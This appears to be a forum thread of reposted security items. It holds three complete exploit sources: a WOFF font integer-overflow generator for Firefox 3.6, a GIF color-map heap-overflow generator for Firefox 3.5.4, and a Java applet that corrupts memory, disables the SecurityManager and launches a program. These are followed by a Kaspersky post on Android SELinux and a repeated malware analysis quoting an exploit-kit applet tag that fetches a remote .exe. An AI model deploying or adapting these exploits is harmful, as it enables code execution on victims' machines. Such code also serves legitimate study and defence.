L.E ) woff_header.flavor = FLAVOR_TRUETYPE_FONT; // sfnt version ( B.E ) woff_header.length = 0x00000000; // woff file total length ( B.E ) woff_header.numTables = 0x0100; // 0x1 - woff dir entry length ( B.E ) woff_header.reserved = 0x0000; // res bit ( all zero ) // totalSFntSize value will bypass validation condition after integer overflow woff_header.totalSfntSize = 0x1C000000; // 0x0000001C ( B.E ) woff_header.majorVersion = 0x0000; // major version woff_header.minorVersion = 0x0000; // minor version woff_header.metaOffset = 0x00000000; // meta data block offset ( not used ) woff_header.metaLength = 0x00000000; // meta data block length ( not used ) woff_header.metaOrigLength = 0x00000000; // meta data block before-compresed length ( not used ) woff_header.privOffset = 0x00000000; // Private data block offset ( not used ) woff_header.privLength = 0x00000000; // Private data block length woff_dir[0].tag = 0x54444245; // 'EBDT' ( B.E ) woff_dir[0].offset = 0x40000000; // 0x00000040 ( B.E ) woff_dir[0].compLength = 0x00000000; // ( B.E ) // to trigger field bit. // 0xFFFFFFF8-0xFFFFFFFF value to trigger integer overflow. // 1) calculation result is 0, it's bypass to sanityCheck() function // 2) passed very long length into zlib Decompressor, it's trigger memory corruption! // 0xFFFFFFFD-0xFFFFFFFF: bypass sanityCheck() // you can use only the value of 0xFFFFFFFF ( integer overflow!!! ) // you can't using other values to bypass validation condition woff_dir[0].origLength = 0xFFFFFFFF; // 0xFFFFFFFF ( B.E ) printf("WOFF_HEADER [ %d bytes ]\n", sizeof(WOFF_HEADER)); printf("WOFF_DIRECTORY [ %d bytes ]\n", sizeof(WOFF_DIRECTORY)); // to compress data block // [ 0x0c0c0c0c 0x0c0c0c0c 0x0c0c0c0c ... ] // ...JIT spray stuff... addr_saved_ret_val = plat[n].addr; addr_saved_ret_val += 0x8; // If add 8bytes it reduced reference error occurs for(i = 0; i < sizeof(dataBlock); i+=4) // 0x004E18F5 { dataBlock[i+0] = (addr_saved_ret_val & 0x000000ff); dataBlock[i+1] = (addr_saved_ret_val & 0x0000ff00) >> 8; dataBlock[i+2] = (addr_saved_ret_val & 0x00ff0000) >> 16; dataBlock[i+3] = (addr_saved_ret_val & 0xff000000) >> 24; } // compress dataBlock with zlib's compress() if(compress((Bytef *)compressed_dataBlock, (uLongf *)&destLen, (Bytef *)dataBlock, (uLong)(sizeof(dataBlock)) ) != Z_OK) { fprintf(stderr, "Zlib compress failed!\n"); exit(-1); } printf("\nZlib compress(dataBlock) ...\n"); printf("DataBlock [ %u bytes ]\n", sizeof(dataBlock)); printf("Compressed DataBlock [ %u bytes ]\n", destLen); printf("[ Z_OK ]\n\n"); total_bytes = sizeof(WOFF_HEADER) + sizeof(WOFF_DIRECTORY) + destLen; total_dataBlock = destLen; printf("Total WOFF File Size: %d bytes\n", total_bytes); // byte order change to total_bytes, total_dataBlock ( L.E into B.E ) total_bytes = ((total_bytes & 0xff000000) >> 24) | ((total_bytes & 0x00ff0000) >> 8) | ((total_bytes & 0x0000ff00) << 8) | ((total_bytes & 0x000000ff) << 24); woff_header.length = total_bytes; total_dataBlock = ((total_dataBlock & 0xff000000) >> 24) | ((total_dataBlock & 0x00ff0000) >> 8) | ((total_dataBlock & 0x0000ff00) << 8) | ((total_dataBlock & 0x000000ff) << 24); woff_dir[0].compLength = total_dataBlock; // create attack code data if((fp = fopen("s.woff", "wb")) < 0) { fprintf(stderr, "that file to create open failed\n"); exit(-2); } // setup WOFF data store fwrite(&woff_header, 1, sizeof(woff_header), fp); fwrite(&woff_dir[0], 1, sizeof(woff_dir[0]), fp); fwrite(&compressed_dataBlock, 1, destLen, fp); fclose(fp); // zlib extract test ret = uncompress(de_buf, &de_Len, compressed_dataBlock, destLen); if(ret != Z_OK) { switch(ret) { case Z_MEM_ERROR: printf("Z_MEM_ERROR\n"); break; case Z_BUF_ERROR: printf("Z_BUF_ERROR\n"); break; case Z_DATA_ERROR: printf("Z_DATA_ERROR\n"); break; } fprintf(stderr, "Zlib uncompress test failed!\n"); unlink("./s.woff"); exit(-3); } printf("\nZlib uncompress test(compressed_dataBlock) ...\n"); printf("[ Z_OK ]\n\n"); return 0; } /* eof */ Sursa: Mozilla Firefox 3.6 - Integer Overflow Exploit
  15. [h=1]Mozilla Firefox 3.5.4 - Local Color Map Exploit[/h] #include <stdio.h>#include <stdlib.h> /* x90c local color map 1day exploit CVE-2009-3373 Firefox local color map 1day exploit (MFSA 2009-56 Firefox local color map parsing heap overflow) Full Exploit: http://www.exploit-db.com/sploits/27699.tgz vulnerable: - Firefox 3.5.4 <= - Firefox 3.0.15 <= - SeaMonkey 2.0 <= x90c */ struct _IMAGE { char GCT_size; // global color map size char Background; // backcolor( select in global color map entry ) char default_pixel_ratio; // 00 char gct[4][3]; // 4 entries of global color map( 1bit/1pixel ) // char app_ext[19]; // application extension 19bytes ( to enable animation ) char gce[2]; // '!' GCE Label = F9 char ext_data; // 04 = 4 bytes of extension data char trans_color_ind; // use transparent color? ( 0/1 ) char ani_delay[2]; // 00 00 ( micro seconds delay in animation ) char trans; // color map entry to apply transparent color ( applied first image ) char terminator1; // 0x00 char image_desc; // ',' char NW_corner[4]; // 00 00 00 00 (0, 0) image put position char canvas_size[4]; // 03 00 05 00 ( 3x5 ) logical canvas size char local_colormap; // 80 use local color map? ( last bottom 3bits are bits per pixel) char lct[4][3]; // local color map ( table ) char LZW_min; // 02 ( LZW data length -1 ) char encoded_image_size;// 03 ( LZW data length ) char image_data[1]; // LZW encoded image data char terminator2; // 0x00 } IMAGE; struct _IMAGE1 { char image_desc; // ',' char NW_corner[4]; // 00 00 00 00 (0, 0) char canvas_size[4]; // 03 00 05 00 ( 3x5 ) char local_colormap; // 00 = no local color map char lct[7][3]; // local color map char lcta[1][2]; // char LZW_min; // 08 // char encoded_image_size; // 0B ( 11 bytes ) // char image_data[9]; // encoded image data //char terminator2; // 0x00 } IMAGE1; struct _GIF_HEADER { char MAGIC[6]; // GIF89a unsigned short canvas_width; // 03 00 unsigned short canvas_height; // 05 00 struct _IMAGE image; struct _IMAGE1 image1; // char trailler; // ; // GIF file trailer } GIF_HEADER; int main(int argc, char *argv[]) { struct _GIF_HEADER gif_header; int i = 0; // (1) first image frame to LZW data, proper dummy ( it's can't put graphic ) // char data[3] = "\x84\x8F\x59"; char data[3] = "\x00\x00\x00"; // (2) second image frame to LZW data, backcolor changed by reference local color map char data1[9] = "\x84\x8F\x59\x84\x8F\x59\x84\x8F\x59"; char app_ext[19] = "\x21\xFF\x0B\x4E\x45\x54\x53\x43\x41\x50\x45\x32\x2E\x30\x03\x01\x00\x00\x00"; // animation tag ( not use ) FILE *fp; memset(&gif_header, 0, sizeof(gif_header)); // MAGIC ( GIF87a ) last version - support alpha value(transparency) gif_header.MAGIC[0] = '\x47'; gif_header.MAGIC[1] = '\x49'; gif_header.MAGIC[2] = '\x46'; gif_header.MAGIC[3] = '\x38'; gif_header.MAGIC[4] = '\x39'; gif_header.MAGIC[5] = '\x61'; // LOGICAL CANVAS gif_header.canvas_width = 3; // global canvas width length gif_header.canvas_height = 5; // height length // GLOBAL HEADER ( included global header, if local color map exists, not used global color map ) gif_header.image.GCT_size = '\x81'; // 81 gif_header.image.Background = '\x00'; // global color table #2 ( black ) gif_header.image.default_pixel_ratio = '\x00'; // 00 ( Default pixel aspect ratio ) // gct ( [200][3] ) gif_header.image.gct[0][0] = '\x43'; gif_header.image.gct[0][1] = '\x43'; gif_header.image.gct[0][2] = '\x43'; gif_header.image.gct[1][0] = '\x43'; gif_header.image.gct[1][1] = '\x43'; gif_header.image.gct[1][2] = '\x43'; gif_header.image.gct[2][0] = '\x43'; gif_header.image.gct[2][1] = '\x43'; gif_header.image.gct[2][2] = '\x43'; gif_header.image.gct[3][0] = '\x43'; gif_header.image.gct[3][1] = '\x43'; gif_header.image.gct[3][2] = '\x43'; /* for(i = 0; i < 19; i++) { gif_header.image.app_ext = app_ext; }*/ gif_header.image.gce[0] = '!'; gif_header.image.gce[1] = '\xF9'; gif_header.image.ext_data = '\x04'; gif_header.image.trans_color_ind = '\x00'; // no use transparent color gif_header.image.ani_delay[0] = '\x00'; // C8 = 2 seconds delay ( animation ) gif_header.image.ani_delay[1] = '\x00'; gif_header.image.trans = '\x00'; // no use transparent color ( color map ) gif_header.image.terminator1 = '\x00'; // IMAGE Header gif_header.image.image_desc = ','; gif_header.image.NW_corner[0] = '\x00'; // 0,0 position gif_header.image.NW_corner[1] = '\x00'; gif_header.image.NW_corner[2] = '\x00'; gif_header.image.NW_corner[3] = '\x00'; gif_header.image.canvas_size[0] = '\x03'; // 3 x 5 canvas gif_header.image.canvas_size[1] = '\x00'; gif_header.image.canvas_size[2] = '\x05'; gif_header.image.canvas_size[3] = '\x00'; gif_header.image.local_colormap = 0x80; // use local color map // gif_header.image.local_colormap |= 0x40; // image formatted in Interlaced order //gif_header.image.local_colormap |= 0x4; // pixel of local color map //gif_header.image.local_colormap |= 0x2; // 2 bits. gif_header.image.local_colormap |= 0x1; // bits per pixel. ( black/white ) gif_header.image.lct[0][0] = '\x42'; // R ( red ) gif_header.image.lct[0][1] = '\x42'; gif_header.image.lct[0][2] = '\x42'; gif_header.image.lct[1][0] = '\x42'; gif_header.image.lct[1][1] = '\x42'; // G ( green ) gif_header.image.lct[1][2] = '\x42'; // b ( blue ) gif_header.image.lct[2][0] = '\x42'; gif_header.image.lct[2][1] = '\x42'; gif_header.image.lct[2][2] = '\x42'; gif_header.image.lct[3][0] = '\x42'; gif_header.image.lct[3][1] = '\x42'; gif_header.image.lct[3][2] = '\x42'; // RASTER DATA gif_header.image.LZW_min = '\x00'; // total encode data - 1 gif_header.image.encoded_image_size = '\x01'; // 255 bytes // encoded data for(i = 0; i < 1; i++) { gif_header.image.image_data = 0xFF; } // RASTER DATA EOF gif_header.image.terminator2 = '\x00'; // -------------------------------------------------- // ------------- IMAGE1 ----------------------------- gif_header.image1.image_desc = ','; gif_header.image1.NW_corner[0] = '\x00'; // (0, 0) gif_header.image1.NW_corner[1] = '\x00'; gif_header.image1.NW_corner[2] = '\x00'; gif_header.image1.NW_corner[3] = '\x00'; gif_header.image1.canvas_size[0] = '\x03'; // 3 x 5 gif_header.image1.canvas_size[1] = '\x00'; gif_header.image1.canvas_size[2] = '\x05'; gif_header.image1.canvas_size[3] = '\x00'; gif_header.image1.local_colormap = 0x80; // use local color map // gif_header.image1.local_colormap |= 0x40; // image formatted in Interlaced order //gif_header.image1.local_colormap |= 0x4; // pixel of local color map 4 pixel gif_header.image1.local_colormap |= 0x2; //gif_header.image1.local_colormap |= 0x1; // 1bit per pixel. // below values are will used as return addr for(i = 0; i < 7; i++) // second image frame's local color map entry length is 8 { gif_header.image1.lct[0] = '\x0c'; // (RET & 0x00FF0000) gif_header.image1.lct[1] = '\x0c'; // (RET & 0xFF00FF00) gif_header.image1.lct[2] = '\x0c'; // (RET & 0X000000FF) } gif_header.image1.lcta[0][0] = '\x0c'; gif_header.image1.lcta[0][1] = '\x0c'; //} // RASTER DATA //gif_header.image1.LZW_min = 0x00;//'\x05'; //gif_header.image1.encoded_image_size = 0x00;//'\x06';*/ // encoded data /* for(i = 0; i < 9; i++) { gif_header.image1.image_data = 0xFF;//data1; }*/ // RASTER DATA // second image frame's last byte ignored ( null terminatee, GIF total trailer ) //gif_header.image1.terminator2 = '\x00'; //gif_header.trailler = ';'; // -------------------------------------------------- fp = fopen("a.gif", "wb"); printf("%d\n", sizeof(struct _GIF_HEADER)); fwrite(&gif_header, sizeof(struct _GIF_HEADER) - 1, 1, fp); fclose(fp); system("xxd ./a.gif"); } Sursa: Mozilla Firefox 3.5.4 - Local Color Map Exploit
  16. Packet Storm Exploit 2013-0819-1 - Oracle Java BytePackedRaster.verify() Signed Integer Overflow Site packetstormsecurity.com The BytePackedRaster.verify() method in Oracle Java versions prior to 7u25 is vulnerable to a signed integer overflow that allows bypassing of "dataBitOffset" boundary checks. This exploit code demonstrates remote code execution by popping calc.exe. It was obtained through the Packet Storm Bug Bounty program. import java.awt.CompositeContext;import java.awt.image.*; import java.awt.color.*; import java.beans.Statement; import java.security.*; public class MyJApplet extends javax.swing.JApplet { /** * Initializes the applet myJApplet */ @Override public void init() { /* Set the Nimbus look and feel */ //<editor-fold defaultstate="collapsed" desc=" Look and feel setting code (optional) "> /* If Nimbus (introduced in Java SE 6) is not available, stay with the default look and feel. * For details see http://download.oracle.com/javase/tutorial/uiswing/lookandfeel/plaf.html */ try { for (javax.swing.UIManager.LookAndFeelInfo info : javax.swing.UIManager.getInstalledLookAndFeels()) { if ("Nimbus".equals(info.getName())) { javax.swing.UIManager.setLookAndFeel(info.getClassName()); break; } } } catch (ClassNotFoundException ex) { java.util.logging.Logger.getLogger(MyJApplet.class.getName()).log(java.util.logging.Level.SEVERE, null, ex); } catch (InstantiationException ex) { java.util.logging.Logger.getLogger(MyJApplet.class.getName()).log(java.util.logging.Level.SEVERE, null, ex); } catch (IllegalAccessException ex) { java.util.logging.Logger.getLogger(MyJApplet.class.getName()).log(java.util.logging.Level.SEVERE, null, ex); } catch (javax.swing.UnsupportedLookAndFeelException ex) { java.util.logging.Logger.getLogger(MyJApplet.class.getName()).log(java.util.logging.Level.SEVERE, null, ex); } //</editor-fold> /* Create and display the applet */ try { java.awt.EventQueue.invokeAndWait(new Runnable() { public void run() { initComponents(); // print environment info logAdd( "JRE: " + System.getProperty("java.vendor") + " " + System.getProperty("java.version") + "\nJVM: " + System.getProperty("java.vm.vendor") + " " + System.getProperty("java.vm.version") + "\nJava Plug-in: " + System.getProperty("javaplugin.version") + "\nOS: " + System.getProperty("os.name") + " " + System.getProperty("os.arch") + " (" + System.getProperty("os.version") + ")" ); } }); } catch (Exception ex) { ex.printStackTrace(); } } public void logAdd(String str) { txtArea.setText(txtArea.getText() + str + "\n"); } public void logAdd(Object o, String... str) { logAdd((str.length > 0 ? str[0]:"") + (o == null ? "null" : o.toString())); } public String errToStr(Throwable t) { String str = "Error: " + t.toString(); StackTraceElement[] ste = t.getStackTrace(); for(int i=0; i < ste.length; i++) { str += "\n\t" + ste.toString(); } t = t.getCause(); if (t != null) str += "\nCaused by: " + errToStr(t); return str; } public void logError(Exception ex) { logAdd(errToStr(ex)); } public static String toHex(int i) { return Integer.toHexString(i); } /** * This method is called from within the init() method to initialize the * form. WARNING: Do NOT modify this code. The content of this method is * always regenerated by the Form Editor. */ @SuppressWarnings("unchecked") // <editor-fold defaultstate="collapsed" desc="Generated Code">//GEN-BEGIN:initComponents private void initComponents() { btnStart = new javax.swing.JButton(); jScrollPane2 = new javax.swing.JScrollPane(); txtArea = new javax.swing.JTextArea(); btnStart.setText("Run calculator"); btnStart.addMouseListener(new java.awt.event.MouseAdapter() { public void mousePressed(java.awt.event.MouseEvent evt) { btnStartMousePressed(evt); } }); txtArea.setEditable(false); txtArea.setColumns(20); txtArea.setFont(new java.awt.Font("Arial", 0, 12)); // NOI18N txtArea.setRows(5); txtArea.setTabSize(4); jScrollPane2.setViewportView(txtArea); javax.swing.GroupLayout layout = new javax.swing.GroupLayout(getContentPane()); getContentPane().setLayout(layout); layout.setHorizontalGroup( layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING) .addGroup(layout.createSequentialGroup() .addContainerGap() .addComponent(jScrollPane2, javax.swing.GroupLayout.DEFAULT_SIZE, 580, Short.MAX_VALUE) .addContainerGap()) .addGroup(layout.createSequentialGroup() .addGap(242, 242, 242) .addComponent(btnStart, javax.swing.GroupLayout.PREFERRED_SIZE, 124, javax.swing.GroupLayout.PREFERRED_SIZE) .addContainerGap(javax.swing.GroupLayout.DEFAULT_SIZE, Short.MAX_VALUE)) ); layout.setVerticalGroup( layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING) .addGroup(javax.swing.GroupLayout.Alignment.TRAILING, layout.createSequentialGroup() .addContainerGap() .addComponent(jScrollPane2, javax.swing.GroupLayout.DEFAULT_SIZE, 344, Short.MAX_VALUE) .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.UNRELATED) .addComponent(btnStart) .addContainerGap()) ); }// </editor-fold>//GEN-END:initComponents private boolean _isMac = System.getProperty("os.name","").contains("Mac"); private boolean _is64 = System.getProperty("os.arch","").contains("64"); private int tryExpl() { try { // alloc aux vars String name = "setSecurityManager"; Object[] o1 = new Object[1]; Object o2 = new Statement(System.class, name, o1); // make a dummy call for init // allocate byte buffer for destination Raster DataBufferByte dst = new DataBufferByte(9); // allocate the target array right after dst[] int[] a = new int[8]; // allocate an object array right after a[] Object[] oo = new Object[7]; // create Statement with the restricted AccessControlContext oo[2] = new Statement(System.class, name, o1); // create powerful AccessControlContext Permissions ps = new Permissions(); ps.add(new AllPermission()); oo[3] = new AccessControlContext( new ProtectionDomain[]{ new ProtectionDomain( new CodeSource( new java.net.URL("file:///"), new java.security.cert.Certificate[0] ), ps ) } ); // store System.class pointer in oo[] oo[4] = ((Statement)oo[2]).getTarget(); // save old a.length int oldLen = a.length; logAdd("a.length = 0x" + toHex(oldLen)); // prepare source buffer DataBufferByte src = new DataBufferByte(8); for(int i=0; i<8; i++) src.setElem(i,-1); // create normal source raster MultiPixelPackedSampleModel sm1 = new MultiPixelPackedSampleModel(DataBuffer.TYPE_BYTE, 4,1,1,4,0); WritableRaster wr1 = Raster.createWritableRaster(sm1, src, null); // create MultiPixelPackedSampleModel with malformed "scanlineStride" and "dataBitOffset" fields MultiPixelPackedSampleModel sm2 = new MultiPixelPackedSampleModel(DataBuffer.TYPE_BYTE, 4,2,1, 0x3fffffdd - (_is64 ? 16:0), 288 + (_is64 ? 128:0)); // create destination BytePackedRaster basing on sm2 WritableRaster wr2 = Raster.createWritableRaster(sm2, dst, null); logAdd(wr2); // create sun.java2d.SunCompositeContext byte[] bb = new byte[] { 0, -1 }; IndexColorModel cm = new IndexColorModel(1, 2, bb, bb, bb); CompositeContext cc = java.awt.AlphaComposite.Src.createContext(cm, cm, null); logAdd(cc); // call native Java_sun_awt_image_BufImgSurfaceData_initRaster() (see ...\jdk\src\share\native\sun\awt\image\BufImgSurfaceData.c) // and native Java_sun_java2d_loops_Blit_Blit() (see ...\jdk\src\share\native\sun\java2d\loops\Blit.c) cc.compose(wr1, wr2, wr2); // check results: a.length should be overwritten by 0xF8 int len = a.length; logAdd("a.length = 0x" + toHex(len)); if (len == oldLen) { // check a[] content corruption // for RnD for(int i=0; i < len; i++) if (a != 0) logAdd("a["+i+"] = 0x" + toHex(a)); // exit logAdd("error 1"); return 1; } // ok, now we can read/write outside the real a[] storage, // lets find our Statement object and replace its private "acc" field value // search for oo[] after a[oldLen] boolean found = false; int ooLen = oo.length; for(int i=oldLen+2; i < oldLen+32; i++) if (a[i-1]==ooLen && a==0 && a[i+1]==0 // oo[0]==null && oo[1]==null && a[i+2]!=0 && a[i+3]!=0 && a[i+4]!=0 // oo[2,3,4] != null && a[i+5]==0 && a[i+6]==0) // oo[5,6] == null { // read pointer from oo[4] int stmTrg = a[i+4]; // search for the Statement.target field behind oo[] for(int j=i+7; j < i+7+64; j++){ if (a[j] == stmTrg) { // overwrite default Statement.acc by oo[3] ("AllPermission") a[j-1] = a[i+3]; found = true; break; } } if (found) break; } // check results if (!found) { // print the memory dump on error // for RnD String s = "a["+oldLen+"...] = "; for(int i=oldLen; i < oldLen+32; i++) s += toHex(a) + ","; logAdd(s); } else try { // show current SecurityManager logAdd(System.getSecurityManager(), "Security Manager = "); // call System.setSecurityManager(null) ((Statement)oo[2]).execute(); // show results: SecurityManager should be null logAdd(System.getSecurityManager(), "Security Manager = "); } catch (Exception ex) { logError(ex); } logAdd(System.getSecurityManager() == null ? "Ok.":"Fail."); } catch (Exception ex) { logError(ex); } return 0; } private void btnStartMousePressed(java.awt.event.MouseEvent evt) {//GEN-FIRST:event_btnStartMousePressed try { logAdd("===== Start ====="); // try several attempts to exploit for(int i=1; i <= 5 && System.getSecurityManager() != null; i++){ logAdd("Attempt #" + i); tryExpl(); } // check results if (System.getSecurityManager() == null) { // execute payload Runtime.getRuntime().exec(_isMac ? "/Applications/Calculator.app/Contents/MacOS/Calculator":"calc.exe"); } logAdd("===== End ====="); } catch (Exception ex) { logError(ex); } }//GEN-LAST:event_btnStartMousePressed // Variables declaration - do not modify//GEN-BEGIN:variables private javax.swing.JButton btnStart; private javax.swing.JScrollPane jScrollPane2; private javax.swing.JTextArea txtArea; // End of variables declaration//GEN-END:variables } Download: http://packetstormsecurity.com/files/download/122865/PSA-2013-0819-1-exploit.tgz Sursa: Packet Storm Exploit 2013-0819-1 - Oracle Java BytePackedRaster.verify() Signed Integer Overflow ? Packet Storm
  17. [h=1]Android 4.3 and SELinux[/h]Stefano Ortolani Kaspersky Lab Expert Posted August 17, 18:20 GMT Not many weeks ago Google released a new revision of its flagship mobile operating system, Android 4.3. Although some say that this time updates have been quite scarce, from a security perspective there have been some undeniable improvements (among others, the "MasterKey" vulnerability has been finally patched). One of the most prominent is SELinux. Many cheered the event as a long-awaited move, while others criticized its implementation. Personally, I think that the impact is not that easy to assess, especially if we were to question the benefits for end-users. In order to shed some light we can't help but analyze a bit more what SELinux is, and what is its threat model. Let's start from the basics: the security of any Linux-based system is built upon the concept of Discretionary Access Control (DAC), meaning that each user decides which of his own files is accessed (read, written, or executed) by other users. The system itself is protected from tampering by having all system files owned by the administrative user 'root'. Android is based on the very same concepts, but with a small but compelling addition: each app is assigned a different user ID (some exceptions are possible though), thereby isolating and protecting the application data from all other applications. This is the reason why on un-rooted devices it is quite difficult, if not impossible, for a legit application to steal the private data used by another application (unless, obviously, that data is set world-readable). gattaca Users $ ls -las total 0 0 drwxr-xr-x 6 root admin 204 Aug 24 2012 . 0 drwxr-xr-x 31 root wheel 1122 Aug 16 12:56 .. 0 -rw-r--r-- 1 root wheel 0 Jun 20 2012 .localized 0 drwxr-xr-x+ 11 Guest _guest 374 Aug 24 2012 Guest 0 drwxrwxrwt 7 root wheel 238 Apr 9 15:58 Shared 0 drwxr-xr-x+ 87 stefano staff 2958 Aug 11 10:35 stefano DAC means that access to file and resources is defined in terms user and file/directory modes. SELinux builds on top of that (and on 15 years of NSA's OS security research), and introduces another security layer termed Mandatory Access Control (MAC). This layer, configured by system-wide policies, further regulates how users (and thus apps on Android devices) access both their and the system-provided data, all this in a transparent manner. In more technical terms, it is possible to design policies that are able to specify the types of interactions a process configured to be part of a security context can and can not do. A simple, but yet effective, example is the case of a system log daemon running with root privileges (ouch). With SELinux we can configure the entire system such that the process can not access anything but the log file: we would simply need to assign a specific label to the log file, and write a policy allowing the log daemon to access only those files so-labeled (as always, consider that things are a bit more complex than that . Note the two advantages coming from this mindset: (1) the policy is something that can be enforced system-wide (and even root has to abide by it); (2) the permissions are much much more fine-grained than those possibly enforced by the DAC. The ability of limiting what the super-user can do (regardless of its privileges) is pivotal to protect the system from privilege escalation attacks. This is in fact where SELinux excels. Let's take the case of Gingerbreak, a wide-spread exploit to root Gingerbread-based devices. The exploit sends a carefully crafted netlink message to the volume daemon (vold) running as root. Due to some missing bound-checks that message can lead to successful code injection and execution. Since the process runs as root, it is in fact trivial to spawn a setuid-root shell and from there taking control of the device. SELinux would have stopped that exploit by denying the very same message: the default policy (at least in the original patch-set) denies opening that type of socket, so problem solved. If that was not enough, execution of non-system binaries through that daemon process can be further denied by another SELinux policy. shell@tilapia:/ # ls -Z /system/ drwxr-xr-x root root u:object_r:unlabeled:s0 app drwxr-xr-x root shell u:object_r:unlabeled:s0 bin drwxr-xr-x root root u:object_r:unlabeled:s0 etc ... Unlabeled FS after OTA update. Awesome, right? Unfortunately, reality is still quite far from that. The SELinux implementation that is currently deployed on stock Android 4.3 images is missing several important features. First off, SELinux is configured in Permissive mode only, meaning that policies are not enforced, and violations are just being logged (not that useful but for testing). Also, as shown above, the OTA update does not label the system partition correctly (my testing device left me puzzled for quite a while till I found that the researcher Pau Oliva published the exact same finding at DEF CON 21), meaning that a stock-restore is mandatory if a developer is to test it. Finally, besides the fact that the provided policies are anything but restrictive, no MAC is available for the Android middleware (a feature instead part of the NSA's patch-set). What does it mean to the end-user then? Unfortunately, as of now, not much. SELinux as deployed on Android 4.3 can only be tested and policies developed. There is also no safe way to enforce it. Now it is in fact OEM vendors' time. Google is strongly encouraging the development of SELinux implementations (BYOD anyone?) based on stock functionalities rather than on poorly assembled add-ons (see again the talk given at DEFCON 21 for a comprehensive explanation of what "implementation issues" might mean). Developers, on the other hand, are strongly encouraged to get accustomed with the default set of policies, and test their apps for breakage. Will we ever see an Android release with SELinux set to enforce mode? That we can only hope Sursa: https://www.securelist.com/en/blog/9175/Android_4_3_and_SELinux
  18. Anti-decompiling techniques in malicious Java Applets Step 1: How this started While I was investigating the Trojan.JS.Iframe.aeq case (see blogpost < http://www.securelist.com/en/blog?weblogid=9151>) one of the files dropped by the Exploit Kit was an Applet exploiting a vulnerability: <script> document.write('<applet archive="dyJhixy.jar" code="QPAfQoaG.ZqnpOsRRk"><param value="http://fast_DELETED_er14.biz/zHvFxj0QRZA/04az-G112lI05m_AF0Y_C5s0Ip-Vk05REX_0AOq_e0skJ/A0tqO-Z0hT_el0iDbi0-4pxr17_11r_09ERI_131_WO0p-MFJ0uk-XF0_IOWI07_Xsj_0ZZ/8j0A/qql0alP/C0o-lKs05qy/H0-nw-Q108K_l70OC-5j150SU_00q-RL0vNSy/0kfAS0X/rmt0N/KOE0/zxE/W0St-ug0vF8-W0xcNf0-FwMd/0KFCi0MC-Ot0z1_kP/0wm470E/y2H0nlwb14-oS8-17jOB0_p2TQ0/eA3-o0NOiJ/0kWpL0LwBo0-sCO_q0El_GQ/roFEKrLR7b.exe?nYiiC38a=8Hx5S" name="kYtNtcpnx"/></applet>'); </script> Step 2: First analysis So basically I unzipped the .jar and took a look using JD-GUI, a java decompiler. These were the resulting classes inside the .jar file: The class names are weird, but nothing unusual. Usually the Manifest states the entry point (main class) of the applet. In this case there was no manifest, but we could see this in the applet call from the html: <applet archive="dyJhixy.jar" code="QPAfQoaG.ZqnpOsRRk"> << Package and Class to execute <param value="http:// fast_DELETED_er14.biz/zHvFxj0QRZA/04az-G112lI05m_AF0Y_C5s0Ip-Vk05REX_0AOq_e0skJ/A0tqO-Z0hT_el0iDbi0-4pxr17_11r_09ERI_131_WO0p-MFJ0uk-XF0_IOWI07_Xsj_0ZZ/8j0A/qql0alP/C0o-lKs05qy/H0-nw-Q108K_l70OC-5j150SU_00q-RL0vNSy/0kfAS0X/rmt0N/KOE0/zxE/W0St-ug0vF8-W0xcNf0-FwMd/0KFCi0MC-Ot0z1_kP/0wm470E/y2H0nlwb14-oS8-17jOB0_p2TQ0/eA3-o0NOiJ/0kWpL0LwBo0-sCO_q0El_GQ/roFEKrLR7b.exe?nYiiC38a=8Hx5S" The third parameter was the .exe that the applet drops. There was no real need to explore any more deeply just to get an overview of what the applet does. However the point here was to analyze the vulnerability that this .jar file exploits. At this point I should say that I was biased. I had read a McAfee report (http://kc.mcafee.com/resources/sites/MCAFEE/content/live/PRODUCT_DOCUMENTATION/24000/PD24588/en_US/McAfee_Labs_Threat_Advisory_STYX_Exploit_Kit.pdf) about a similar campaign using the same Exploit kit. In this report they said that the malware dropped by this particular HTML inside the kit was CVE-2013-0422. Usually the first clue which might confirm this would be verdicts from AV vendors, but this time it was not the case: https://www.virustotal.com/es/file/e6e27b0ee2432e2ce734e8c3c1a199071779f9e3ea5b327b199877b6bb96c651/analysis/1375717187/ Ok, so let's take a look at the decompiled code, starting from the entry point. We can confirm that the ZqnpOsRRk class is implementing the Applet: package QPAfQoaG;import java.applet.Applet; import java.lang.reflect.Constructor; import java.lang.reflect.Method; public class ZqnpOsRRk extends Applet Anti-decompiling techniques in malicious Java Applets Step 1: How this started While I was investigating the Trojan.JS.Iframe.aeq case (see blogpost < http://www.securelist.com/en/blog?weblogid=9151>) one of the files dropped by the Exploit Kit was an Applet exploiting a vulnerability: <script> document.write('<applet archive="dyJhixy.jar" code="QPAfQoaG.ZqnpOsRRk"><param value="http://fast_DELETED_er14.biz/zHvFxj0QRZA/04az-G112lI05m_AF0Y_C5s0Ip-Vk05REX_0AOq_e0skJ/A0tqO-Z0hT_el0iDbi0-4pxr17_11r_09ERI_131_WO0p-MFJ0uk-XF0_IOWI07_Xsj_0ZZ/8j0A/qql0alP/C0o-lKs05qy/H0-nw-Q108K_l70OC-5j150SU_00q-RL0vNSy/0kfAS0X/rmt0N/KOE0/zxE/W0St-ug0vF8-W0xcNf0-FwMd/0KFCi0MC-Ot0z1_kP/0wm470E/y2H0nlwb14-oS8-17jOB0_p2TQ0/eA3-o0NOiJ/0kWpL0LwBo0-sCO_q0El_GQ/roFEKrLR7b.exe?nYiiC38a=8Hx5S" name="kYtNtcpnx"/></applet>'); </script> Step 2: First analysis So basically I unzipped the .jar and took a look using JD-GUI, a java decompiler. These were the resulting classes inside the .jar file: The class names are weird, but nothing unusual. Usually the Manifest states the entry point (main class) of the applet. In this case there was no manifest, but we could see this in the applet call from the html: <applet archive="dyJhixy.jar" code="QPAfQoaG.ZqnpOsRRk"> << Package and Class to execute <param value="http:// fast_DELETED_er14.biz/zHvFxj0QRZA/04az-G112lI05m_AF0Y_C5s0Ip-Vk05REX_0AOq_e0skJ/A0tqO-Z0hT_el0iDbi0-4pxr17_11r_09ERI_131_WO0p-MFJ0uk-XF0_IOWI07_Xsj_0ZZ/8j0A/qql0alP/C0o-lKs05qy/H0-nw-Q108K_l70OC-5j150SU_00q-RL0vNSy/0kfAS0X/rmt0N/KOE0/zxE/W0St-ug0vF8-W0xcNf0-FwMd/0KFCi0MC-Ot0z1_kP/0wm470E/y2H0nlwb14-oS8-17jOB0_p2TQ0/eA3-o0NOiJ/0kWpL0LwBo0-sCO_q0El_GQ/roFEKrLR7b.exe?nYiiC38a=8Hx5S" The third parameter was the .exe that the applet drops. There was no real need to explore any more deeply just to get 